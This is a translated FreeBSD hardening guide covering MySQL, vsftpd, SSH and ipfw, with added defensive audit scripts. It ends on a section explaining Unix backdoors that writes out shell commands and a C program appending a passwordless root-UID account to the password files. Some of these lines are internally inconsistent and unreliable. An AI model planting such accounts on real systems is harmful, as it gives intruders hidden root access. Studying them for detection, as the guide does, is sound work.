Building secure Web servers under FreeBSD (3)

Source: Internet
Author: User
For the database account that your PHP scripts use, it is best to create a dedicated user that has only the privileges it needs (UPDATE, SELECT, DELETE, INSERT, DROP TABLE, CREATE TABLE and so on) on a single database. If that username and password are ever read by an attacker, this keeps the loss to a minimum.
For example, create a database db1 and a user test1 that accesses only that database:
mysql> CREATE DATABASE db1;
mysql> GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP ON db1.* TO 'test1'@'localhost' IDENTIFIED BY 'AdminDB';
The SQL above creates the database db1 and adds the user test1 with the password AdminDB. That user can connect to MySQL only from the local host, and has only the SELECT, INSERT, UPDATE, DELETE, CREATE and DROP privileges on the db1 database.
(7) Preventing ordinary users from seeing other users' databases
If you host several databases, each with its own user, you must stop each user from browsing the contents of the other databases. Starting the MySQL server with the --skip-show-database option achieves this.
(8) Recovering from a forgotten MySQL password
If you forget the MySQL root password, start the server with the --skip-grant-tables option so that it skips checking the grant tables (./safe_mysqld --skip-grant-tables &). You can then connect to the server directly, change the root user's password, and restart MySQL to log in with the new password. While the server runs in this mode it accepts any connection without a password, so keep it unreachable from the network until it has been restarted normally.
(9) Securing the database files
By default MySQL is installed under /usr/local/mysql, so the database files live in /usr/local/mysql/var. We must make sure that unauthorized users cannot get at this directory and simply copy the database files away, so restrict access to it.
Change the owner and group of the directory to mysql and remove all access for group and others:
# chown -R mysql:mysql /usr/local/mysql/var
# chmod -R go-rwx /usr/local/mysql/var
(10) Removing history records
The commands above are recorded by the shell in its history file; bash, for example, writes them to .bash_history in the user's home directory. If that file is read, the database password leaks. Likewise, the SQL statements executed after logging in to the database are recorded by MySQL in .mysql_history in the user's home directory, so if a database user changes a password with an SQL statement, that password is exposed through .mysql_history as well. Therefore, when logging in or making backups from the shell, do not put the password directly after -p; give -p alone and type the password at the prompt.
Beyond that, stop these two files from recording our operations at all, just in case:
# rm .bash_history .mysql_history
# ln -s /dev/null .bash_history
# ln -s /dev/null .mysql_history
(11) Other
You can also consider chroot and similar mechanisms to confine the directory in which MySQL runs and to control its permissions more tightly; see the relevant articles for details.
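As an added example that is not part of the original article, the POSIX shell functions below check the two things that items (9) and (10) set up: that nothing under the MySQL data directory is readable, writable or executable by group or others, and that a home directory's .bash_history and .mysql_history are either redirected to /dev/null or at least do not record a mysql command with the password given inline after -p. The data directory and home directory are parameters; the defaults assume the article's /usr/local/mysql/var layout and a root home of /root.

```shell
#!/bin/sh
# Added example: audit the MySQL data directory and the shell/MySQL history files.
# Paths are parameters; the defaults follow the article's layout.

# exposed_entries DIR: print every file or directory under DIR that has any
# read, write or execute bit set for group or others.
exposed_entries() {
    find "$1" \( -perm -g+r -o -perm -g+w -o -perm -g+x \
               -o -perm -o+r -o -perm -o+w -o -perm -o+x \) -print
}

# datadir_is_private DIR: succeed (exit 0) only if nothing under DIR is exposed.
datadir_is_private() {
    [ -z "$(exposed_entries "$1")" ]
}

# history_disabled FILE: succeed if FILE is a symlink to /dev/null, i.e. the
# shell or the mysql client can no longer record anything in it.
history_disabled() {
    [ -L "$1" ] && [ "$(readlink "$1")" = "/dev/null" ]
}

# history_leaks_password FILE: succeed if FILE contains a mysql/mysqldump/mysqladmin
# invocation whose password is on the command line (-pSECRET or --password=SECRET)
# instead of being prompted for with a bare -p.
history_leaks_password() {
    [ -f "$1" ] &&
    grep -E '(^|[[:space:]])(mysql|mysqldump|mysqladmin)([[:space:]]|$)' "$1" |
    grep -Eq -- '(^|[[:space:]])(-p[^[:space:]]+|--password=[^[:space:]]+)'
}

# audit_mysql_host [DATADIR] [HOMEDIR]: print findings; return the number of problems.
audit_mysql_host() {
    datadir=${1:-/usr/local/mysql/var}
    homedir=${2:-/root}
    problems=0
    if datadir_is_private "$datadir"; then
        echo "ok   $datadir is not accessible to group/others"
    else
        echo "BAD  entries under $datadir accessible to group/others:"
        exposed_entries "$datadir"
        problems=$((problems + 1))
    fi
    for hist in .bash_history .mysql_history; do
        f="$homedir/$hist"
        if history_disabled "$f"; then
            echo "ok   $f -> /dev/null"
        elif history_leaks_password "$f"; then
            echo "BAD  $f records a command-line password"
            problems=$((problems + 1))
        else
            echo "WARN $f is still being written; consider linking it to /dev/null"
        fi
    done
    return $problems
}
```

Run it as root after the chown/chmod and ln commands above, for example `audit_mysql_host /usr/local/mysql/var /root`; a non-zero exit status means at least one of the two protections is missing.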

4. VSFTPD Security Settings
vsftpd is a well-known FTP daemon, used by many large organizations including redhat.com. It is a very secure program; its name says as much: Very Secure FTP Daemon.
vsftpd has many configuration options covering every aspect of the service; here we concentrate on the following security settings.
Our requirement is to use a system account as the FTP account for managing our files. Suppose I need only one account to update my site and do not want that account to be able to log in to the system. If the site directory is /usr/www, we create a new user named ftp whose home directory is /usr/www and whose shell is /usr/sbin/nologin. With no usable shell, the user cannot log in to the system through SSH or similar means.
The following settings are specific to our system and are made in the vsftpd configuration file, vsftpd.conf.
(1) Disable anonymous access. We do not need anonymous users, so forbid them outright:
anonymous_enable=NO
(2) Allow local users to log in, because we manage the site through FTP with a local user:
local_enable=YES
(3) Allow only the ftp user, or a few designated users, to access FTP. The system has many accounts, and they must not all be able to log in.
Enable the user list feature:
userlist_enable=YES
Allow only the users in the user list file to access FTP:
userlist_deny=NO
Path of the user list file:
userlist_file=/etc/vsftpd.user_list
Then create the file /etc/vsftpd.user_list with one user name per line; add the user ftp, plus any other system accounts you want to allow.
(4) Forbid certain users from logging in to FTP:
pam_service_name=vsftpd
This is the name of the PAM service that vsftpd uses for PAM authentication. The default is vsftpd, and the corresponding PAM configuration file is /etc/pam.d/vsftpd.
/etc/vsftpd.ftpusers
vsftpd refuses FTP logins for the users listed in this file, one user name per line. This mechanism is set up by default in /etc/pam.d/vsftpd.
This function overlaps with the one in (3); the two can be combined, which is best.
(5) Lock local users into their own home directory so they cannot move to other directories and, for example, download /etc/passwd:
chroot_local_user=NO
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
Then create /etc/vsftpd.chroot_list, listing one local account per line that we want to confine; we add ftp so that it cannot reach the rest of the system.
(6) Hide the real owner and group of files, so that an attacker who gets FTP access cannot learn more about the system's users:
hide_ids=YES
(7) Disable the ls -R command to save resources, since recursive listings of large directories consume a lot of system resources:
ls_recurse_enable=NO
(8) Default permissions for uploaded files; set the umask to 022:
local_umask=022
If you also want to be able to overwrite and delete files, enable writing:
write_enable=YES
(9) FTP banner. To stop attackers learning more about the server, set this item:
ftpd_banner=banner string
Replace "banner string" with the banner prompt you want; for security, do not expose any information about vsftpd.
If you have a longer message, you can instead have the banner read from a file:
banner_file=/directory/vsftpd_banner_file
(10) Enable logging:
xferlog_enable=YES
and set the log file at the same time:
xferlog_file=/var/log/vsftpd.log
To log every FTP command and response (verbose logging):
log_ftp_protocol=YES
(11) If you enable the virtual user feature, it is recommended to disable local user login:
local_enable=NO

vsftpd has many more security settings. It lives up to its name, Very Secure FTP Daemon, and very few overflow-type vulnerabilities have been found in it. If you want to be even more secure, tune vsftpd to your own needs; configured well, it is about as safe as an FTP server gets.

5. SSH Security Settings
SSH is a remote management service that runs over an encrypted connection. It was created mainly to solve the problem that Telnet, rlogin, rsh and similar programs transmit their sessions in clear text, which is easy to eavesdrop on, so SSH is generally recommended in place of Telnet, rlogin, rsh and other remote management services.
Under Windows you can connect to and manage the server directly with secure SSH client tools. The most popular server is OpenSSH; the latest version is OpenSSH 4.0, and details can be found at www.openssh.com.
OpenSSH is already installed on FreeBSD; FreeBSD 5.3 ships OpenSSH 3.8.1, and upgrading to 4.0 from ports is recommended.

The main security configuration file is /etc/ssh/sshd_config; edit that file.
(1) Use protocol 2 instead of protocol 1. SSH2 is more secure, and restricting the server to it prevents an attacker from hijacking session setup by tampering with the version banner to force a downgrade to protocol 1. Replace the "Protocol 2,1" line with:
Protocol 2
(2) Set a sensible limit on unauthenticated connections to mitigate denial-of-service attacks:
MaxStartups 5:50:10
(3) Disable X11 forwarding to prevent session hijacking:
X11Forwarding no

(4) Static passwords are not recommended; use DSA or RSA keys instead. Disable password authentication with:
PasswordAuthentication no
(5) Restrict shell access to one group, or even to individual users:
AllowGroups wheel
or
AllowUsers heiyeluren
(6) Forbid root from logging in directly, mainly to defeat brute-force attacks:
PermitRootLogin no
(7) Do not allow users with empty passwords to log in:
PermitEmptyPasswords no
(8) Use TCP wrappers to restrict access further: edit /etc/hosts.allow, comment out "ALL : ALL : allow", and add:
sshd : localhost : allow
sshd : friendlycomputer : allow
sshd : ALL : deny
# Related command: give an account a non-login shell
# chsh -s /sbin/nologin user
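The settings in sections 4 and 5 are easy to get wrong through a duplicated line or a typo in a key name, and the two daemons resolve duplicates differently: vsftpd takes the last occurrence of a key, sshd the first. As an added example that is not part of the original article, the POSIX shell script below reads both file styles (vsftpd's key=value and sshd_config's Key value, keys compared case-insensitively), honours each daemon's precedence rule, and reports every recommended setting from the two sections that is missing or set to another value. The file paths are parameters; the two sample files used in the checks below are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: check vsftpd.conf and sshd_config against the settings recommended above.

# cfg_get FILE KEY first|last: print the effective value of KEY in FILE.
# Handles "key=value" (vsftpd) and "Key value" (sshd); comment and blank lines are
# skipped and keys match case-insensitively. "first" returns the first occurrence
# (sshd_config semantics), "last" the final one (vsftpd semantics).
cfg_get() {
    awk -v want="$2" -v mode="$3" '
        BEGIN { want = tolower(want) }
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        {
            line = $0
            sub(/^[[:space:]]+/, "", line); sub(/[[:space:]]+$/, "", line)
            key = line; sub(/[[:space:]=].*$/, "", key)
            val = line; sub(/^[^[:space:]=]+[[:space:]=]+/, "", val)
            if (tolower(key) == want && (mode == "last" || !seen)) { found = val; seen = 1 }
        }
        END { if (seen) print found }
    ' "$1"
}

# check_setting FILE KEY EXPECTED first|last: report one setting; exit 0 if it matches.
check_setting() {
    actual=$(cfg_get "$1" "$2" "$4")
    if [ "$(printf '%s' "$actual" | tr 'A-Z' 'a-z')" = "$(printf '%s' "$3" | tr 'A-Z' 'a-z')" ]; then
        printf 'ok   %s = %s\n' "$2" "$actual"
        return 0
    fi
    printf 'BAD  %s = %s (expected %s)\n' "$2" "${actual:-<unset>}" "$3"
    return 1
}

# audit_file FILE first|last KEY=EXPECTED...: return the number of deviating settings.
audit_file() {
    file=$1; mode=$2; shift 2
    bad=0
    for pair in "$@"; do
        check_setting "$file" "${pair%%=*}" "${pair#*=}" "$mode" || bad=$((bad + 1))
    done
    return $bad
}

# The recommendations from section 4 (vsftpd.conf, last occurrence wins).
audit_vsftpd() {
    audit_file "$1" last anonymous_enable=NO local_enable=YES userlist_enable=YES \
        userlist_deny=NO chroot_list_enable=YES hide_ids=YES ls_recurse_enable=NO \
        local_umask=022 xferlog_enable=YES
}

# The recommendations from section 5 (sshd_config, first occurrence wins).
audit_sshd() {
    audit_file "$1" first Protocol=2 X11Forwarding=no PasswordAuthentication=no \
        PermitRootLogin=no PermitEmptyPasswords=no
}
```

Typical use on the server is `audit_vsftpd /usr/local/etc/vsftpd.conf; audit_sshd /etc/ssh/sshd_config`; the exit status is the number of deviations, so both calls returning 0 means every recommended line is in effect.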

IV. Installing and configuring a firewall
FreeBSD ships with a packet-filtering firewall, ipfw. Its features are not as rich as a professional firewall's, but it is more than enough to secure a web site, so we use it to protect our web server.

1. Install ipfw
The core of ipfw runs in the kernel, so you need to add some options to the FreeBSD kernel configuration file. (If you have not installed the FreeBSD kernel source, the directory below will not exist, so install the kernel source first.) First go to the kernel configuration directory:
# cd /sys/i386/conf
# cp GENERIC ./KERNEL_FW
Open the new kernel configuration file:
# ee ./KERNEL_FW
Add the following four options (the comment lines are explanation only and need not be added):
options IPFIREWALL
# Compiles the packet-filtering code into the kernel.
options IPFIREWALL_VERBOSE
# Enables logging through syslogd. Without this option, packets are not actually logged even when a filter rule asks for them to be.
options IPFIREWALL_VERBOSE_LIMIT=10
# Limits the number of log entries per rule that syslogd(8) records. This is useful in hostile environments when you want to log firewall activity without risking a denial of service from a flood of syslog entries.
options IPFIREWALL_DEFAULT_TO_ACCEPT
# Changes the default rule action from "deny" to "allow". This keeps you from locking yourself out when you reboot into an ipfw-enabled kernel before the firewall is configured, and is handy if you often use ipfw(8) to troubleshoot. Use it with care, however, because it opens the firewall and changes its behaviour.

Compile the kernel:
# /usr/sbin/config KERNEL_FW
# cd ../compile/KERNEL_FW (check your version: on versions below 5.0 use ../../compile/KERNEL_FW)
# make depend
# make
# make install
Reboot the system. Note that we did not select the option IPFIREWALL_DEFAULT_TO_ACCEPT, which means that once the firewall starts after boot its default rule denies every connection ("deny ip from any to any"). Be sure to do the following work at the console, or you will lock yourself out. If you do choose that option, SSH and other connections are unaffected, but it is less safe.

2. Configure ipfw
To configure individual rules, use the command form:
ipfw command syntax: ipfw [-n] command [number] action [log] protocol address [other options]
For example:
# ipfw add allow tcp from any to 10.10.10.1 80   # allow the outside world to reach my web service
# ipfw add allow tcp from any to 10.10.10.1 21   # allow the outside world to reach my FTP service
# ipfw add allow tcp from any to 10.10.10.1 22   # allow the outside world to reach my SSH service
If you prefer a rule file, read on.
For the firewall to run after the system boots, we also need to configure rc.conf:
# ee /etc/rc.conf
Add the following:
gateway_enable="YES"                 # enable the gateway function
firewall_enable="YES"                # activate the firewall
firewall_script="/etc/rc.firewall"   # the default firewall script
firewall_type="/etc/ipfw.conf"       # our custom rule file
firewall_quiet="NO"                  # show each rule as the script loads it; set this to "YES" once your rule file is settled
firewall_logging="YES"               # enable firewall logging
Then edit /etc/syslog.conf:
# ee /etc/syslog.conf
Add these lines:
!ipfw
*.*                                             /var/log/ipfw.log
Now the most important part, the rule file:
# ee /etc/ipfw.conf
Add the rules below (10.10.10.1 is our server's IP):
######### TCP ##########
add 00001 deny log ip from any to any ipoptions rr
add 00002 deny log ip from any to any ipoptions ts
add 00003 deny log ip from any to any ipoptions ssrr
add 00004 deny log ip from any to any ipoptions lsrr
add 00005 deny tcp from any to any tcpflags syn,fin
# These five lines filter out various scanning packets.
add 10001 allow tcp from any to 10.10.10.1 80   # open the HTTP service to the whole Internet
add 10002 allow tcp from any to 10.10.10.1 21   # open the FTP service to the whole Internet
add 10000 allow tcp from 1.2.3.4 to 10.10.10.1 22
# SSH is open only to the IP 1.2.3.4, that is, only this IP is trusted to log in over SSH.
# If the IP you log in from is not fixed, use instead: add 10000 allow tcp from any to 10.10.10.1 22 in
add 19997 check-state
add 19998 allow tcp from any to any out keep-state setup
add 19999 allow tcp from any to any out
# These three together allow the internal network to connect outwards. If you do not want the server to open TCP connections to the Internet, you can remove 19997 and 19998 (access to the server from outside is not affected).
########## UDP ##########
add 20001 allow udp from any 53 to 10.10.10.1   # allow replies from other DNS servers into the server, needed for name resolution
add 29999 allow udp from any to any out         # allow our own UDP packets out
########## ICMP #########
add 30000 allow icmp from any to any icmptypes 3
add 30001 allow icmp from any to any icmptypes 4
add 30002 allow icmp from any to any icmptypes 8 out
add 30003 allow icmp from any to any icmptypes 0 in
add 30004 allow icmp from any to any icmptypes 11   # type 11 (time exceeded) is assumed here; the number was lost from the original line
# Allow us to ping other servers, and allow the internal network to use traceroute for route tracing.
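The "deny log" rules above, together with the syslog.conf entry, send each blocked scan packet to /var/log/ipfw.log, and that file is only useful if someone reads it. As an added example that is not part of the original article, the POSIX shell functions below count how often a given rule fired and list the source addresses that were denied at least a given number of times. The message layout assumed is the kernel's "ipfw: <rule> <Action> <PROTO> <src>[:<sport>] <dst>[:<dport>] <in|out> via <iface>"; the sample lines, the interface name fxp0 and the source addresses are constructed for the demonstration (10.10.10.1 is the article's server).

```shell
#!/bin/sh
# Added example: summarise what the "deny log" rules write to /var/log/ipfw.log.
# Assumed message layout (after the syslog prefix):
#   ipfw: <rule> <Action> <PROTO> <src>[:<sport>] <dst>[:<dport>] <in|out> via <iface>

# Constructed sample log lines (not real traffic). Rules 1 and 3 carry "log" in the
# article's rule file; a TCP or UDP packet with IP options is logged with its ports,
# an ICMP packet as ICMP:<type>.<code> without ports.
SAMPLE_IPFW_LOG='Mar  1 10:00:01 web kernel: ipfw: 1 Deny TCP 203.0.113.7:40001 10.10.10.1:80 in via fxp0
Mar  1 10:00:01 web kernel: ipfw: 1 Deny TCP 203.0.113.7:40002 10.10.10.1:21 in via fxp0
Mar  1 10:00:02 web kernel: ipfw: 3 Deny ICMP:8.0 203.0.113.7 10.10.10.1 in via fxp0
Mar  1 10:00:04 web kernel: ipfw: 1 Deny UDP 192.0.2.33:1025 10.10.10.1:53 in via fxp0
Mar  1 10:00:05 web kernel: ipfw: 2 Deny TCP 198.51.100.9:4444 10.10.10.1:22 in via fxp0'

# write_sample_log: store the sample in a temporary file and print its path.
write_sample_log() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_IPFW_LOG" > "$f"
    echo "$f"
}

# denied_by_rule FILE RULE: count the denied packets that matched rule number RULE.
denied_by_rule() {
    awk -v rule="$2" '
        {
            for (i = 1; i <= NF; i++) if ($i == "ipfw:") break
            if (i <= NF && $(i+1) == rule && $(i+2) == "Deny") n++
        }
        END { print n + 0 }
    ' "$1"
}

# top_denied_sources FILE MIN: print "count source" for every source address
# with at least MIN denied packets, most active first.
top_denied_sources() {
    awk -v min="$2" '
        {
            for (i = 1; i <= NF; i++) if ($i == "ipfw:") break
            if (i > NF || $(i+2) != "Deny") next
            src = $(i+4); sub(/:[0-9]+$/, "", src)   # strip the source port when present
            n[src]++
        }
        END { for (s in n) if (n[s] >= min) print n[s], s }
    ' "$1" | sort -rn
}

# Stand-alone demonstration on the sample; on the server pass /var/log/ipfw.log instead.
f=$(write_sample_log)
echo "packets denied by rule 00001 (record-route option): $(denied_by_rule "$f" 1)"
echo "sources denied at least twice:"
top_denied_sources "$f" 2
rm -f "$f"
```

Because IPFIREWALL_VERBOSE_LIMIT=10 caps the entries per rule, a count that sits exactly at the limit means the rule stopped logging, not that the scan stopped; `ipfw show` still reports the real packet counters.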

Backdoor techniques on Unix/Linux and how to guard against them
For an attacker, breaking into a system is only the start of a long march; what matters most to them is keeping the compromised machine (a "broiler", or puppet machine) for the long term, so backdoor techniques are of great importance. We defenders are always in the passive position: nobody can guarantee that their system is absolutely secure, so we cannot rule out an intrusion. Apart from the experts who intrude only as a test or a technical challenge, an ordinary attacker will almost certainly leave a backdoor after breaking in. Since we must guard against this, we must understand the common backdoor techniques. Below is a brief discussion of the more common ones on Unix/Linux systems.
1. Account backdoor
The most common and most primitive backdoor technique is to add an administrator account to the system:
# echo "heiyeluren:*:0:0::/root:/bin/sh" >> /etc/passwd
# echo "heiyeluren::0:0::0:0::/root:/bin/sh" >> /etc/shadow
This adds an account with UID and GID 0 (root) and no password.
FreeBSD stores passwords in /etc/master.passwd, so the command becomes:
# echo "heiyeluren::::::::" >> /etc/master.passwd
The same can be done with a program:
/* add super user */
#include <stdio.h>
#define PASSWD_PATH "/etc/passwd"
#define SHADOW_PATH "/etc/master.passwd"
int main(void)
{
    FILE *fd;
    fd = fopen(PASSWD_PATH, "a+");
    fprintf(fd, "heiyeluren:*:0:0::/root:/bin/sh\n");
    fclose(fd);
    fd = fopen(SHADOW_PATH, "a+");
    fprintf(fd, "heiyeluren::0:0::0:0::/root:/bin/sh\n");
    fclose(fd);
    return 0;
}
# gcc -o adduser adduser.c
# ./adduser
This method is rather crude and generally easy to spot, especially on a system with few accounts. Some attackers choose confusing user names, though, such as r00t with UID and GID 0, so if you are not paying attention you may be fooled.
* Precautions:
Although this method is relatively easy to find, we still have to guard against it. Pay close attention to the system's accounts; our system has few of them, which makes checking easy. Also watch whether the rarely used accounts have been changed. For example, the default account bind has the shell /usr/sbin/nologin and cannot log in, but if an intruder changes it to /bin/csh, the account becomes usable for login without you knowing. The best approach is therefore to keep a separate copy of /etc/passwd, compare against it at irregular intervals, and make /etc/passwd and /etc/master.passwd readable only by root.
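As an added example that is not part of the original article, the POSIX shell functions below implement the checks the precautions paragraph recommends: list accounts with UID 0 other than root, accounts with an empty password field, and accounts that were added, removed, or whose login shell differs from a saved copy of the file. They work on both /etc/passwd (seven fields) and FreeBSD's /etc/master.passwd (ten fields), because the user, password, UID and GID are the first four fields in both formats and the login shell is always the last. The two sample files used in the checks are constructed; the names r00t and bind come from the text above.

```shell
#!/bin/sh
# Added example: audit a passwd-style file for the account-backdoor signs described above.
# Works on /etc/passwd (7 fields) and /etc/master.passwd (10 fields):
# field 1 = user, 2 = password, 3 = UID, 4 = GID, last field = login shell.

# extra_uid0_accounts FILE: every account with UID 0 whose name is not "root".
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# empty_password_accounts FILE: accounts whose password field is empty, i.e. that
# can log in without a password (a locked account shows "*" instead).
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# shell_changes BASELINE CURRENT: accounts added, removed, or whose shell changed
# since BASELINE was copied. A system account moved from nologin to a real shell
# is exactly the case the article warns about.
shell_changes() {
    awk -F: '
        NR == FNR { base[$1] = $NF; next }      # first file: remember the baseline shells
        !($1 in base) { print "added: " $1 " shell=" $NF; next }
        base[$1] != $NF { print "shell changed: " $1 " " base[$1] " -> " $NF }
        { delete base[$1] }
        END { for (u in base) print "removed: " u }
    ' "$1" "$2"
}

# audit_accounts BASELINE CURRENT: print every finding, one per line.
audit_accounts() {
    extra_uid0_accounts "$2"     | sed 's/^/extra UID 0 account: /'
    empty_password_accounts "$2" | sed 's/^/empty password: /'
    shell_changes "$1" "$2"
}
```

On FreeBSD, keep the root-only copy with `cp /etc/master.passwd /root/master.passwd.base` once the system is set up, then run `audit_accounts /root/master.passwd.base /etc/master.passwd` from cron; an empty report is the expected result, and any line deserves an immediate look.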

  
